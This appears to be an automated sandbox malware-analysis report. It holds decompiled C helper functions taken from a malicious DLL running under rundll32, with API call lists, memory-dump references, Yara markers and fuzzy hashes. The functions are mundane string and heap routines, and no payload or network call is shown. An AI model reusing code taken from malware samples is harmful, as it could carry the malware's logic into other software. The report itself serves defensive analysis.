                                            				// Spin with a 10 ms sleep until the busy flag at offset 0x16 clears.
                                            				while(1) {
                                            					_t5 =  *0x49fa3cc; // 0x4f795b0
                                            					_t1 =  &(_t5[0x16]); // 0x0
                                            					if( *_t1 == 0) {
                                            						break;
                                            					}
                                            					Sleep(0xa);
                                            				}
                                            				// Release the previously stored buffer unless it is the static default at 0x49fb81a.
                                            				_t7 =  *0x49fa3cc; // 0x4f795b0
                                            				_t10 =  *_t7;
                                            				if(_t10 != 0 && _t10 != 0x49fb81a) {
                                            					HeapFree( *0x49fa2d8, 0, _t10);
                                            					_t7 =  *0x49fa3cc; // 0x4f795b0
                                            				}
                                            				// Store the new buffer pointer and leave the critical section.
                                            				 *_t7 = _v0;
                                            				_t8 =  &(_t7[0x10]);
                                            				RtlLeaveCriticalSection(_t8); // unresolved __imp__ in the decompiler output; resolved from the APIs list (ref: 049F3FD4)
                                            				return _t8;
                                            			}

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F3F87
                                            • Sleep.KERNEL32(0000000A), ref: 049F3F91
                                            • HeapFree.KERNEL32(00000000), ref: 049F3FBF
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F3FD4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: c652b8be6e3073807018505488a79819d32a4f473c214f118c404048097f295d
                                            • Instruction ID: 6cf23b4c6db9d73e32c0fcb76b1a653a8d8aa6c95d513a8296839fe824ba695d
                                            • Opcode Fuzzy Hash: c652b8be6e3073807018505488a79819d32a4f473c214f118c404048097f295d
                                            • Instruction Fuzzy Hash: D7F062B43492029FEB289F64ED49B257BF5EB84741B095039EE06D7290C67CBC50DB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0581299C
                                            • Sleep.KERNEL32(0000000A), ref: 058129A6
                                            • HeapFree.KERNEL32(00000000), ref: 058129D4
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 058129E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: aa489251de129f1ae6e62ece7f9b5c2350ab9b9f1d9dc8cc680a87ab26ace675
                                            • Instruction ID: 8251b8c84e45c5f39dc4816ef2cf28fcca592b9bbf840d9a732b19c0ee895baf
                                            • Opcode Fuzzy Hash: aa489251de129f1ae6e62ece7f9b5c2350ab9b9f1d9dc8cc680a87ab26ace675
                                            • Instruction Fuzzy Hash: 91F0B7782242419FEB289B59E88BE267FA5AB44701B45D415FC03C72A0CE30BC94CB2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0580D252
                                              • Part of subcall function 058146C8: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,0580D0A2,?,?,?,00000000,00000000), ref: 058146ED
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 0581470F
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 05814725
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 0581473B
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 05814751
                                              • Part of subcall function 058146C8: GetProcAddress.KERNEL32(00000000,?), ref: 05814767
                                              • Part of subcall function 0580C000: memcpy.NTDLL(?,?,00000000,?,?,00001003,0581A412,0581A412,?,?,?,00000000,00000000), ref: 0580C074
                                              • Part of subcall function 0580C000: memcpy.NTDLL(00000000,?,?), ref: 0580C0DB
                                            • memcpy.NTDLL(?,?,00000004,?,?,0581A412,0581A412,0581A412,?,?,?,00000000,00000000), ref: 0580D101
                                              • Part of subcall function 0580A5C0: GetModuleHandleA.KERNEL32(?,?,?,0580D1BF,?,?,00000000,00000000), ref: 0580A5FE
                                              • Part of subcall function 0580A5C0: memcpy.NTDLL(?,0582932C,00000018,?,?,?), ref: 0580A67A
                                            • memcpy.NTDLL(?,?,00000018,?,?,0581A412,0581A412,0581A412,?,?,?,00000000,00000000), ref: 0580D14F
                                            • memcpy.NTDLL(?,05803BC6,00000800,?,?,00000000,00000000), ref: 0580D1D2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$AddressProc$HandleModule$memset
                                            • String ID:
                                            • API String ID: 1554640953-0
                                            • Opcode ID: bcefeb7fe37fb426838ea4d1cec3a23610ebdddca172a025f17c4f1721b1e0bf
                                            • Instruction ID: e04bf242ee49a9fe1e6d3f7b78aab3286404e5bb040165bb92d9c752d5152523
                                            • Opcode Fuzzy Hash: bcefeb7fe37fb426838ea4d1cec3a23610ebdddca172a025f17c4f1721b1e0bf
                                            • Instruction Fuzzy Hash: 70A148B1A0120AEFDB50DF98CC84AAEBBB5BF04304F145569EC11E7291D770EE85CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0582028E
                                            • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0580B047,00000000), ref: 058202DC
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,05821C4A,00000000,0580B047,05816749,00000000,0580B047,058130E3,00000000,0580B047,0581105E,00000000), ref: 058205E7
                                            • GetLastError.KERNEL32(?,00000000,?), ref: 058208E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseErrorFreeHandleHeapLastmemset
                                            • String ID:
                                            • API String ID: 2333114656-0
                                            • Opcode ID: 20c059412410ff39a23ba77c6b34b999062a84b734ac5d1a356a1d1bbd7ad98f
                                            • Instruction ID: 04664192825527201a322c996427beea99d3d4aa1025c24d11dbb891e9bdce33
                                            • Opcode Fuzzy Hash: 20c059412410ff39a23ba77c6b34b999062a84b734ac5d1a356a1d1bbd7ad98f
                                            • Instruction Fuzzy Hash: A251C335704328FEDB11AE689C4EFAF3E6EAB44314F004026BD16E6590DAB08DD197A7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0580A3E3
                                            • memcpy.NTDLL ref: 0580A40B
                                              • Part of subcall function 0581AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 0581ADD6
                                              • Part of subcall function 0581AD9E: SetLastError.KERNEL32(00000000), ref: 0581ADDD
                                            • GetLastError.KERNEL32(00000010,00000218,0582327D,00000100,?,00000318,00000008), ref: 0580A422
                                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0582327D,00000100), ref: 0580A505
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID:
                                            • API String ID: 1706616652-0
                                            • Opcode ID: 271bc24b1313642ee320545c22605c617011446c77848da98c24aa35996e5f3f
                                            • Instruction ID: 8f1e5c61953ea4b371cac3b38bfd9efaec5c315cfcf572be75891be25eaebae6
                                            • Opcode Fuzzy Hash: 271bc24b1313642ee320545c22605c617011446c77848da98c24aa35996e5f3f
                                            • Instruction Fuzzy Hash: F04151B1604701AFD764DF68CC45FAABBE9FB48310F00892DF999C6290EB30D9548B66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05816378: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?), ref: 0581639C
                                              • Part of subcall function 05816378: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058163AE
                                              • Part of subcall function 05816378: wcstombs.NTDLL ref: 058163BC
                                              • Part of subcall function 05816378: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?), ref: 058163E0
                                              • Part of subcall function 05816378: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 058163F5
                                              • Part of subcall function 05816378: mbstowcs.NTDLL ref: 05816402
                                              • Part of subcall function 05816378: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 05816414
                                              • Part of subcall function 05816378: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 0581642E
                                            • GetLastError.KERNEL32 ref: 0580109F
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 058058DC
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05805900
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05801087,?,?,?,?,?,?,?), ref: 0580590E
                                            • HeapFree.KERNEL32(00000000,?), ref: 058010BB
                                            • HeapFree.KERNEL32(00000000,?), ref: 058010CC
                                            • SetLastError.KERNEL32(00000000), ref: 058010CF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                            • String ID:
                                            • API String ID: 3867366388-0
                                            • Opcode ID: 8178e4bfe6a3d917dd8789a2c0c3f174e20b29d0e2b48df0c7e3c7b7ca57d96b
                                            • Instruction ID: 7e96964bad9d2f86804a047dd5c07c55d793bc36f3b267ba46cc30462653b931
                                            • Opcode Fuzzy Hash: 8178e4bfe6a3d917dd8789a2c0c3f174e20b29d0e2b48df0c7e3c7b7ca57d96b
                                            • Instruction Fuzzy Hash: DA311436900218ABCF529FA9DC8989EBFB5FB49320B108156FD56E2160D7319EA0DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581B4CF: lstrlen.KERNEL32(00000000,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B529
                                              • Part of subcall function 0581B4CF: lstrlen.KERNEL32(?,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B547
                                              • Part of subcall function 0581B4CF: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0581B573
                                              • Part of subcall function 0581B4CF: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B58A
                                              • Part of subcall function 0581B4CF: HeapFree.KERNEL32(00000000,00000000), ref: 0581B59D
                                              • Part of subcall function 0581B4CF: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B5AC
                                            • GetLastError.KERNEL32 ref: 0581DB0C
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 058058DC
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05805900
                                              • Part of subcall function 0580582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05801087,?,?,?,?,?,?,?), ref: 0580590E
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581DB28
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581DB39
                                            • SetLastError.KERNEL32(00000000), ref: 0581DB3C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                            • String ID:
                                            • API String ID: 2451549186-0
                                            • Opcode ID: 9a97d926e2b0d8154f3518d8558e38740c5e15bcefd45195ac4052e49e2fcc0d
                                            • Instruction ID: 5c320cbf9fe09027598a7c8bf76792213d1d52d60154d3ef46dbfb90c10986be
                                            • Opcode Fuzzy Hash: 9a97d926e2b0d8154f3518d8558e38740c5e15bcefd45195ac4052e49e2fcc0d
                                            • Instruction Fuzzy Hash: FC312632904108AFCF129F99DC458DEBFB9FB48320B148156FD16E2160D7719EA1DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 365ed3c44d09d3b8590d9528ce047255c305d10b26e89a4b5932b1dfbd2271c4
                                            • Instruction ID: 6885f1b9ccb64a3cfacb081753594069f589e1d280bd038ed12d96e1699b45fe
                                            • Opcode Fuzzy Hash: 365ed3c44d09d3b8590d9528ce047255c305d10b26e89a4b5932b1dfbd2271c4
                                            • Instruction Fuzzy Hash: 6A218BB2600A09BBDB609F62DC84966BB39FF09310B041518ED46D6892D332EDB1CBD5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
			E049F5296(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				// Splits the ANSI string at _a4 into two heap-allocated copies: the part before the
				// first '/' (or '?', located by subcall 049F79D7, see the APIs list) and the remainder.
				// Outputs go to *_a8 and *_a12; returns 1 on success, 0 if a heap allocation fails.
				intOrPtr* _v8;
				void* _t2;
				void* _t17;
				intOrPtr* _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;
				
				_t17 = __eax;
				_t37 = 0;
				lstrlen(_a4); // import resolved from the APIs list: lstrlen.KERNEL32, ref 049F52A2
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E049F4DF6(_t2); // heap allocation (RtlAllocateHeap via subcall 049F4DF6)
				if(_t34 != 0) {
					_t30 = E049F4DF6(_t28);
					if(_t30 == 0) {
						E049F4C73(_t34); // free the first buffer when the second allocation fails
					} else {
						_t39 = _a4;
						_t22 = E049F79D7(_t39); // StrChrA for '/' (0x2F) or '?' (0x3F)
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							// Two identical separator bytes in a row ("//"): skip them and search again
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E049F79D7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							// No separator: first part is the whole string, second part is "/"
							lstrcpy(_t34, _a4); // import resolved from the APIs list: lstrcpy.KERNEL32, ref 049F531C
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							// Separator found: copy the prefix, then the remainder starting at the separator
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							lstrcpy(_t30, _v8); // import resolved from the APIs list: lstrcpy.KERNEL32, ref 049F5310
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?,?,00000000), ref: 049F52A2
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                              • Part of subcall function 049F79D7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,049F52D0,00000000,00000001,00000001,?,?,049F4BF5,?,?,?,?,00000102), ref: 049F79E5
                                              • Part of subcall function 049F79D7: StrChrA.SHLWAPI(?,0000003F,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?,?,00000000,00000000), ref: 049F79EF
                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?), ref: 049F5300
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F5310
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F531C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
• Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3767559652-0
                                            • Opcode ID: 20c73ad3deee1d3e7d7c9a159416de12cf153bf7d524e2b5cd6cc55a53bb1256
                                            • Instruction ID: d63f8ea23ed01a915a6579232f18f70abef7905852d2b28db791a9953aacc231
                                            • Opcode Fuzzy Hash: 20c73ad3deee1d3e7d7c9a159416de12cf153bf7d524e2b5cd6cc55a53bb1256
                                            • Instruction Fuzzy Hash: 1621C072504259FBCB125FB8CC44A9F7FA9AF563A4B464070FA059B202E774E900C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000), ref: 0580F12F
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                              • Part of subcall function 058227EB: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0580F15D,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000), ref: 058227F9
                                              • Part of subcall function 058227EB: StrChrA.SHLWAPI(?,0000003F,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?), ref: 05822803
                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?), ref: 0580F18D
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0580F19D
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0580F1A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3767559652-0
                                            • Opcode ID: 5a1079de321fd9538af6e9912bb4877b2df028d6aa2efa33d6078ecf94e651bc
                                            • Instruction ID: b9bb205708af2e328d9d91c2e337cc67c2d42872d7139f906c0276d10a057f72
                                            • Opcode Fuzzy Hash: 5a1079de321fd9538af6e9912bb4877b2df028d6aa2efa33d6078ecf94e651bc
                                            • Instruction Fuzzy Hash: 9621A276608315ABCB62AF68CC48A9A7FFDAF46280B059055FE06DB251DA31DD40CBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                            • Instruction ID: 47113f3e2e6ce6182ab5a9fc2ca1e1b22f17018dc19385df8fdfd5562163e552
                                            • Opcode Fuzzy Hash: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                            • Instruction Fuzzy Hash: A41191B2601609BBC7149FA0DC44E66773DFF09310F040119ED89D9850E772F9B29BD9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F6203(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                            				void* _v8;
                                            				void* _t18;
                                            				int _t25;
                                            				int _t29;
                                            				int _t34;
                                            
                                            				_t29 = lstrlenW(_a4);
                                            				_t25 = lstrlenW(_a8);
                                            				_t18 = E049F4DF6(_t25 + _t29 + _t25 + _t29 + 2);
                                            				_v8 = _t18;
                                            				if(_t18 != 0) {
                                            					_t34 = _t29 + _t29;
                                            					memcpy(_t18, _a4, _t34);
                                            					_t10 = _t25 + 2; // 0x2
                                            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                            				}
                                            				return _v8;
                                            			}

                                            APIs
                                            • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,04F793CC,?,049F6861,004F0053,04F793CC,?,?,?,?,?,?,049F6BB4), ref: 049F6213
                                            • lstrlenW.KERNEL32(049F6861,?,049F6861,004F0053,04F793CC,?,?,?,?,?,?,049F6BB4), ref: 049F621A
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,049F6861,004F0053,04F793CC,?,?,?,?,?,?,049F6BB4), ref: 049F623A
                                            • memcpy.NTDLL(76C869A0,049F6861,00000002,00000000,004F0053,76C869A0,?,?,049F6861,004F0053,04F793CC), ref: 049F624D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
• Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlenmemcpy$AllocateHeap
                                            • String ID:
                                            • API String ID: 2411391700-0
                                            • Opcode ID: c446165816da017447d7593d121c02f821fc82fd090d0f430ba0b0f70a1d0b45
                                            • Instruction ID: 2087b362776fb3695ebdb607dfa4a834bafb8670cfaadf97ed250e92743f6665
                                            • Opcode Fuzzy Hash: c446165816da017447d7593d121c02f821fc82fd090d0f430ba0b0f70a1d0b45
                                            • Instruction Fuzzy Hash: 24F0E776900119BB9F11EFE9CC89CDF7BACEF892587154072EE04D7201E635EE159BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(69B25F44,?,?,00000000,0581385A,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 05815361
                                            • lstrlen.KERNEL32(?,?,?,?), ref: 05815366
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 05815382
                                            • lstrcpy.KERNEL32(00000000,?), ref: 058153A0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                            • String ID:
                                            • API String ID: 1697500751-0
                                            • Opcode ID: c5fd3c18152988ee3cacf4a9d64ce640f0c8305d35bc20e99016adbb7bbd5886
                                            • Instruction ID: 6a62b759af7909b63128ef702136d6e6de5d82dddaa673756eed2c905872a9d6
                                            • Opcode Fuzzy Hash: c5fd3c18152988ee3cacf4a9d64ce640f0c8305d35bc20e99016adbb7bbd5886
                                            • Instruction Fuzzy Hash: DEF0CDBB508B41ABD7219AAAAC8CE1BBF9CBBC6311B094415FD46C3200D731D8048BB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(04F79B90,00000000,00000000,75BCC740,049F6568,00000000), ref: 049F3980
                                            • lstrlen.KERNEL32(?), ref: 049F3988
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • lstrcpy.KERNEL32(00000000,04F79B90), ref: 049F399C
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F39A7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
• Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                            • String ID:
                                            • API String ID: 74227042-0
                                            • Opcode ID: 0eee967f5c49b7c987e548bec1c1c4155d2c8170377ab19cb52f82eede1b5579
                                            • Instruction ID: 439aa57f53ac7b3d47a7507da66c953571dabf7aab47245f0845fbe035f9b8a9
                                            • Opcode Fuzzy Hash: 0eee967f5c49b7c987e548bec1c1c4155d2c8170377ab19cb52f82eede1b5579
                                            • Instruction Fuzzy Hash: 6CE09273505620AB87119BA8AC48C9BBFACEFC96617080436FE00D3100C729AC01CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(05D78560,00000000,00000000,76CC81D0,0580ACFB,00000000), ref: 0581E641
                                            • lstrlen.KERNEL32(?), ref: 0581E649
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000,05D78560), ref: 0581E65D
                                            • lstrcat.KERNEL32(00000000,?), ref: 0581E668
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                            • String ID:
                                            • API String ID: 74227042-0
                                            • Opcode ID: fdf685f8036bf3bca6df3d3147f6bb8121645d2dc4615aa9569eba3ccfefacbb
                                            • Instruction ID: 3b2e1da8ff72064fb26c4e3468409eea44c6c85b03c0e31de1e712ef9c446457
                                            • Opcode Fuzzy Hash: fdf685f8036bf3bca6df3d3147f6bb8121645d2dc4615aa9569eba3ccfefacbb
                                            • Instruction Fuzzy Hash: 3FE09233911220A78A219BE8AC4CC5FFFACEFC96117048416FE01D3110CB21A800CBB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
